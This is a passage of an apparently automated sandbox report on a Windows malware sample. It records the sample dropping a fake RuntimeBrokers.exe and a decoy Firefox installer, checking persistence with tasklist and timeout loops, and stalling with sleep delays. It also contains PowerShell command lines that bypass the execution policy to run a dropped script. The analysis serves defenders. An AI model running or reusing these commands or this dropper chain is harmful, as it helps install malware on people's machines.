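powershell.exe itself loads, not from the sample; the update-xztodolist.cqttech.com URL in RuntimeBrokers.exe is the one string there worth pivoting on.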
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: libcurl.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: dinput8.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: devenum.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: edgegdi.dll
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: Firefox Setup 132.0.2.exe.lnk.4.dr LNK file: ..\..\Public\Bilite\Firefox Setup 132.0.2.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Fqae7BLq4m.exe Static file information: File size 70322189 > 1048576
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201220974867.0000000008585000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201220974867.00000000085A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \YSS\Release\libcurl.pdb source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201214927053.000000000710B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb>1 source: powershell.exe, 0000000E.00000002.201222818106.00000000086C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: G:\ZCSD\XZRecordAlone\xzrecordalone\Release\XZCalendarServer.pdb source: RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000E.00000002.201222343312.0000000008672000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201222818106.00000000086C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb], source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb, source: powershell.exe, 0000000E.00000002.201222343312.0000000008672000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb0 source: powershell.exe, 0000000E.00000002.201214927053.000000000710B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe Code function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow, 0_2_00406D5D
Source: libcurl.dll.0.dr Static PE information: section name: .00cfg
Source: backup.dll.4.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe Code function: 0_2_00411C20 push eax; ret 0_2_00411C4E
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe File created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe File created: C:\Users\user\AppData\Local\Temp\backup.dll
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe File created: C:\Users\Public\Bilite\Firefox Setup 132.0.2.exe
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe File created: C:\Users\Public\Bilite\Axialis\libcurl.dll
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe File created: C:\Users\user\AppData\Local\Temp\backup.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe Key value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe Window / User API: threadDelayed 8105
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9806
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9846
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dll
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe Dropped PE file which has not been started: C:\Users\Public\Bilite\Firefox Setup 132.0.2.exe
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 8260 Thread sleep time: -73000s >= -30000s
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 8256 Thread sleep count: 105 > 30
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 8256 Thread sleep time: -315000s >= -30000s
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 8256 Thread sleep count: 8105 > 30
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 8256 Thread sleep time: -24315000s >= -30000s
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 8864 Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 1808 Thread sleep count: 41 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9136 Thread sleep count: 9806 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9196 Thread sleep count: 9846 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4608 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 3292 Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8144 Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6148 Thread sleep count: 269 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 4292 Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5432 Thread sleep count: 269 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5840 Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5476 Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 4560 Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7612 Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 1564 Thread sleep count: 269 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 3384 Thread sleep count: 269 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 32 Thread sleep count: 268 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe Code function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe Code function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe Thread delayed: delay time: 73000
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe Code function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_0040D72E cpuid 0_2_0040D72E
